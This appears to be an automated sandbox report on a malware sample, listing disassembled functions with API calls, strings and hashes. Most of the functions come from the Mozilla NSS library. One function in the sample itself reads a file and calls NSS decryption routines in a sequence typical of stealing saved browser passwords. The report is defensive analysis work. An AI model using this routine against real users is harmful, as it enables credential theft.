Opcode Fuzzy Hash: b025295747556bb05e0daf5a9afbbf45a368f16ccc68ee36a731eec876321bb1
Instruction Fuzzy Hash: 8A41D6B5A01144AFDB018F54DE4CE8A7BB2FB8231DF884035E50867B12DF349958CFAA

Function 6C632D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C632DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C632E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C632E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C632E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C604F1C,?,-00000001,00000000,?), ref: 6C632E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C604F1C,?,-00000001,00000000), ref: 6C632E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C632EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C632EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C632EF8
PR_Unlock.NSS3(?), ref: 6C632F62
TlsGetValue.KERNEL32 ref: 6C632F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C632F9E
PR_Unlock.NSS3(?), ref: 6C632FCA
TlsGetValue.KERNEL32 ref: 6C63301A
EnterCriticalSection.KERNEL32(?), ref: 6C63302E
PR_Unlock.NSS3(?), ref: 6C633066
PR_SetError.NSS3(00000000,00000000), ref: 6C633085
PR_Unlock.NSS3(?), ref: 6C6330EC
TlsGetValue.KERNEL32 ref: 6C63310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C633124
PR_Unlock.NSS3(?), ref: 6C63314C

Part of subcall function 6C619180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C64379E,?,6C619568,00000000,?,6C64379E,?,00000001,?), ref: 6C61918D
Part of subcall function 6C619180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C64379E,?,6C619568,00000000,?,6C64379E,?,00000001,?), ref: 6C6191A0

Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07AD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07CD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07D6
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C57204A), ref: 6C5E07E4
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,6C57204A), ref: 6C5E0864
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C5E0880
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C57204A), ref: 6C5E08CB
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08D7
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C63316D

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: c1f9b941dd306c370655a44abb8c243b9ac0045ff1016d52490e09c6b0a80dd6
Instruction ID: 45a3a3546cce5bf7ab9457469f8cfa2131c321cc611f373cf7cac02e7ee547a6
Opcode Fuzzy Hash: c1f9b941dd306c370655a44abb8c243b9ac0045ff1016d52490e09c6b0a80dd6
Instruction Fuzzy Hash: B0F1AEB1D00219AFDF00DF64D884B9ABBB4FF09318F546169EC08A7751EB31E996CB85

Function 6C626D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C626D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C626DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C626DC3

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C626DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C626DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C626E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C626E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C626E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C626EB9

Strings

*pulDigestLen = 0x%x, xrefs: 6C626EB4
ulDataLen = %d, xrefs: 6C626E0E
hSession = 0x%x, xrefs: 6C626D9E, 6C626DAE
(CK_INVALID_HANDLE), xrefs: 6C626DBC
npl, xrefs: 6C626E61, 6C626E95
C_Digest, xrefs: 6C626D81
pulDigestLen = 0x%p, xrefs: 6C626E42
pDigest = 0x%p, xrefs: 6C626E27
pData = 0x%p, xrefs: 6C626DF5

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$npl
API String ID: 1003633598-430673897
Opcode ID: 05f370f4391f6e60c16a354e51403647e94a7123490f5032f7bcc86e5d5bfe4b
Instruction ID: dcee22645665d7c70fd6b6ff0fc71a1d86c33c9d26940810e17e38d213b766e1
Opcode Fuzzy Hash: 05f370f4391f6e60c16a354e51403647e94a7123490f5032f7bcc86e5d5bfe4b
Instruction Fuzzy Hash: CC41D1B5601104AFEB009F64DE4DE8A7BB1AB8231CF884025E808A7B11DF35E919CF96

Function 6C628820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C628846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C628874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C628883

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C628899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6288BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6288D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6288EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C628907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C628979

Strings

ulEncryptedPartLen = %d, xrefs: 6C6288CE
pEncryptedPart = 0x%p, xrefs: 6C6288B5
pPart = 0x%p, xrefs: 6C6288E7
*pulPartLen = 0x%x, xrefs: 6C628974
C_DecryptVerifyUpdate, xrefs: 6C628841
hSession = 0x%x, xrefs: 6C62885E, 6C62886E
pulPartLen = 0x%p, xrefs: 6C628902
(CK_INVALID_HANDLE), xrefs: 6C62887C
npl, xrefs: 6C628921, 6C628955

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$npl
API String ID: 1003633598-842452381
Opcode ID: ba06037e24275a11a95a33929daec1d492e855a93e056b5fd9a0914ff67d5b38
Instruction ID: 2c745bbfdc9a865b56c97d6e3dc1b58c8039ce187230e5b7827d91a058118b66
Opcode Fuzzy Hash: ba06037e24275a11a95a33929daec1d492e855a93e056b5fd9a0914ff67d5b38
Instruction Fuzzy Hash: BE41B6B6A01144AFEB008F54DE4CB8A7BB1EB4635DF884036E50867B21DF349918CF96

Function 6C634C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C634C4C
EnterCriticalSection.KERNEL32(?), ref: 6C634C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C634CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C634CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C634CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C634D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C634D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C634DB7

Part of subcall function 6C69DD70: TlsGetValue.KERNEL32 ref: 6C69DD8C
Part of subcall function 6C69DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C69DDB4

Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07AD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07CD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07D6
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C57204A), ref: 6C5E07E4
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,6C57204A), ref: 6C5E0864
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C5E0880
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C57204A), ref: 6C5E08CB
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08D7
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08FB

TlsGetValue.KERNEL32 ref: 6C634DD7
EnterCriticalSection.KERNEL32(?), ref: 6C634DEC
PR_Unlock.NSS3(?), ref: 6C634E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C634E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C634E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C634E71
free.MOZGLUE(00000000), ref: 6C634E7A
PR_Unlock.NSS3(?), ref: 6C634EA2
TlsGetValue.KERNEL32 ref: 6C634EC1
EnterCriticalSection.KERNEL32(?), ref: 6C634ED6
PR_Unlock.NSS3(?), ref: 6C634F01
free.MOZGLUE(00000000), ref: 6C634F2A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: d6eb755e26984e9375c232209134032cb18a957fdf8aede0a2abe64873bba1a7
Instruction ID: 4ea74135ef6c28698d3976d3d81042d9c05fdedef01139d2e31d0730826b7c8a
Opcode Fuzzy Hash: d6eb755e26984e9375c232209134032cb18a957fdf8aede0a2abe64873bba1a7
Instruction Fuzzy Hash: 97B14671A002159FDB00EF68CC44AAABBB4FF46319F046079EC0997B40EB72E965CBD5

Function 6C686E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C686BF7), ref: 6C686EB6

Part of subcall function 6C5E1240: TlsGetValue.KERNEL32(00000040,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E1267
Part of subcall function 6C5E1240: EnterCriticalSection.KERNEL32(?,?,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E127C
Part of subcall function 6C5E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E1291
Part of subcall function 6C5E1240: PR_Unlock.NSS3(?,?,?,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C72FC0A,6C686BF7), ref: 6C686ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C686EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C686EFC
PR_NewLock.NSS3 ref: 6C686F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C686F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C686BF7), ref: 6C686F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C686BF7), ref: 6C686F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C686BF7), ref: 6C686FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C686BF7), ref: 6C686FFD

Strings

SSLKEYLOGFILE, xrefs: 6C686EB1
SSLFORCELOCKS, xrefs: 6C686F2B
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C686F4F
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C686EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C686FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C686FDB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 523ab0fc9d9fd15e9ed03e7305a05728e5c310c76df37732c82aeda43e9b0da4
Instruction ID: ee5ce35427c80b308f8c9a209862847e93e751acf2bd487e16561ce15511f04d
Opcode Fuzzy Hash: 523ab0fc9d9fd15e9ed03e7305a05728e5c310c76df37732c82aeda43e9b0da4
Instruction Fuzzy Hash: 42A12DB2B6B99187E710463CCC0179432A2A78732EF984375FA31C7EE5DF75D44082AA

Function 00EEC130 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 00EEC142

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013301D0,00000000,?,00EFEC9C,00000000,?,?), ref: 00EEC206
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EEC223
GetFileSize.KERNEL32(00000000,00000000), ref: 00EEC22F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EEC242

Part of subcall function 00EF6800: malloc.MSVCRT ref: 00EF6808

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EEC272
StrStrA.SHLWAPI(?,01330248,00EFE56F), ref: 00EEC290
StrStrA.SHLWAPI(00000000,01330080), ref: 00EEC2B7
StrStrA.SHLWAPI(?,01330C68,00000000,?,00EFECA8,00000000,?,00000000,00000000,?,0132D5C8,00000000,?,00EFECA4,00000000,?), ref: 00EEC435
StrStrA.SHLWAPI(00000000,01330D88), ref: 00EEC44C

Part of subcall function 00EEBFC0: memset.MSVCRT ref: 00EEBFF3
Part of subcall function 00EEBFC0: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0132D4B8), ref: 00EEC011
Part of subcall function 00EEBFC0: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EEC01C
Part of subcall function 00EEBFC0: PK11_GetInternalKeySlot.NSS3 ref: 00EEC02A
Part of subcall function 00EEBFC0: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00EEC045
Part of subcall function 00EEBFC0: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00EEC08B
Part of subcall function 00EEBFC0: memcpy.MSVCRT ref: 00EEC0B2
Part of subcall function 00EEBFC0: PK11_FreeSlot.NSS3(?), ref: 00EEC101

StrStrA.SHLWAPI(?,01330D88,00000000,?,00EFECAC,00000000,?,00000000,0132D4B8), ref: 00EEC4ED
StrStrA.SHLWAPI(00000000,0132D5A8), ref: 00EEC504

Part of subcall function 00EEBFC0: lstrcat.KERNEL32(?,00EFE51F), ref: 00EEC0E3
Part of subcall function 00EEBFC0: lstrcat.KERNEL32(?,00EFE562), ref: 00EEC0F7
Part of subcall function 00EEBFC0: lstrcat.KERNEL32(?,00EFE563), ref: 00EEC118

lstrlen.KERNEL32(00000000), ref: 00EEC5D7
CloseHandle.KERNEL32(00000000), ref: 00EEC629
NSS_Shutdown.NSS3 ref: 00EEC637

Strings

, xrefs: 00EEC163

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: 7e817ab7f41a61962936643ff6a5a35c49ab19f677a2ba8486a7607d2f9ce671
Instruction ID: 664e19e3e1957641322d219724f2a382405d7cfb0352800007e10d243cfe7b4c
Opcode Fuzzy Hash: 7e817ab7f41a61962936643ff6a5a35c49ab19f677a2ba8486a7607d2f9ce671
Instruction Fuzzy Hash: DAE1DA7281010CABCF19EFA4DD96EEEB7B9AF14300F1051A9F206B6191EF706A45CF65

Function 6C624E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C624E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C624EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C624EC7

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C624EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C624F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C624F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C624F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C624F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C624F68

Strings

hObject = 0x%x, xrefs: 6C624EF5, 6C624F05
pTemplate = 0x%p, xrefs: 6C624F4A
C_GetAttributeValue, xrefs: 6C624E7E
hSession = 0x%x, xrefs: 6C624EA2, 6C624EB2
(CK_INVALID_HANDLE), xrefs: 6C624EC0, 6C624F13
npl, xrefs: 6C624F82, 6C624FB2
ulCount = %d, xrefs: 6C624F63

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$npl
API String ID: 1003633598-1405801257
Opcode ID: 4077469f5f64050e39e49f6fb1e4c36367af1b1d5b8e4aabfa1c3b5bdbca3a1e
Instruction ID: 02e47d71fb7d38085a9e543781e1a266ae69a0ea274e87e9c98f3a16ad6974f3
Opcode Fuzzy Hash: 4077469f5f64050e39e49f6fb1e4c36367af1b1d5b8e4aabfa1c3b5bdbca3a1e
Instruction Fuzzy Hash: D241B3B1601144ABEB009F54DE8CFAB7BB5AB9235DF484025E40857B11DF789A08CF9A

Function 6C624CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C624CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C624D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C624D37

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C624D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C624D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C624D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C624DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C624DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C624E20

Strings

hObject = 0x%x, xrefs: 6C624D65, 6C624D75
C_GetObjectSize, xrefs: 6C624CEE
pulSize = 0x%p, xrefs: 6C624DB7
hSession = 0x%x, xrefs: 6C624D12, 6C624D22
(CK_INVALID_HANDLE), xrefs: 6C624D30, 6C624D83
npl, xrefs: 6C624DD4, 6C624DFF
*pulSize = 0x%x, xrefs: 6C624E1B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$npl
API String ID: 1003633598-1185938464
Opcode ID: da8cd4dd90ae20f4d2887ece8ddc5a7f61a918d3445169da6c1a6499dc858601
Instruction ID: 337ac8dcbd50eb488f575926dada62be256cf71e68c6eb3f5ea15c7f33b6207e
Opcode Fuzzy Hash: da8cd4dd90ae20f4d2887ece8ddc5a7f61a918d3445169da6c1a6499dc858601
Instruction Fuzzy Hash: 5841B6B1601204AFEB009F54DE8CB6A3BF5EB5635DF484435E8086BA11DF789D48CF9A

Function 6C622F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C622F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C622F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C622F63

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

